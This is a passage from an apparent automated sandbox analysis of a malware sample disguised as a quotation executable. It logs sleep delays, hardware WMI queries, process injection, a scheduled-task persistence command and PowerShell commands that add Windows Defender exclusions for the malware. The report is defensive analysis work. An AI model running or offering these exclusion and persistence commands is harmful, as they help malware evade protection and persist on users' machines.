                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -597031s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -596915s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -596812s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -596703s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -596593s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -596484s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -596375s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -596265s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -596156s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -596046s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -595934s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -595828s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -595718s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -595609s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -595500s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -595390s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -595281s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -595171s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -595062s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -594953s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -594839s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -594734s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7424Thread sleep time: -594625s >= -30000s
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 598999Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 598889Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 598672Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 598561Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 598451Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 598343Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 598124Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 598002Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 597789Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 597683Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 597553Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 597422Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 597308Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 597187Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 597078Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 596968Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 596859Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 596750Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 596640Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 596531Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 596417Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 596297Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 596187Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 596078Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595968Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595859Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595749Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595639Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595531Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595410Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595279Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 595169Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594864Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594585Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594468Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594359Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594244Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594125Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeThread delayed: delay time: 594015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599859
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599750
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599640
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599531
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599421
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599312
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599203
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 599093
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598984
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598874
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598726
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598609
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598499
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598390
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598281
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598171
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 598059
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 597953
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 597843
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 597317
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 597165
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 597049
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596921
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596812
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596697
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596574
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596468
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596302
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596171
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 596062
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595949
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595843
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595734
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595624
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595515
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595406
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595268
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 595146
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 594450
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 594343
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 594234
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 594125
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 594015
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 593906
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 593794
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 593687
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 593578
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 593464
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeThread delayed: delay time: 593310
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599768
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599640
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599454
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599328
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599217
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599109
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598781
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598671
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598562
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598453
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598343
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598234
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598125
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598015
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597906
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597796
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597687
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597578
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597468
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597359
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597250
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597140
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597031
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596921
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596812
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596703
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596593
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596484
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596375
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596260
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596142
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596015
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595905
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595791
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595679
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595575
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595468
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595358
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599875
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599765
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599654
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599547
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599437
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599327
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599218
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599109
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598994
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598781
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598668
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598562
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598453
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598339
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598234
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598125
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598015
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597906
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597797
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597687
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597578
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597468
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597359
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597250
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597140
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597031
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596915
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596812
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596703
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596593
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596484
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596375
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596265
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596156
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596046
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595934
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595828
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595718
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595609
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595500
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595390
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595281
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595171
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595062
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594953
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594839
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594734
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594625
                    Source: rQuotation3200025006.exe, 00000008.00000002.4158424515.0000000000F54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
                    Source: sgxIb.exe, 0000001C.00000002.4158194442.000000000181E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
                    Source: pBBqGOzrz.exe, 0000000E.00000002.4157797826.000000000168A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
                    Source: sgxIb.exe, 00000016.00000002.1959190035.00000000015C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe"
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe"
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe"Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeMemory written: C:\Users\user\Desktop\rQuotation3200025006.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeMemory written: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory written: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory written: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp3D2.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeProcess created: C:\Users\user\Desktop\rQuotation3200025006.exe "C:\Users\user\Desktop\rQuotation3200025006.exe"Jump to behavior
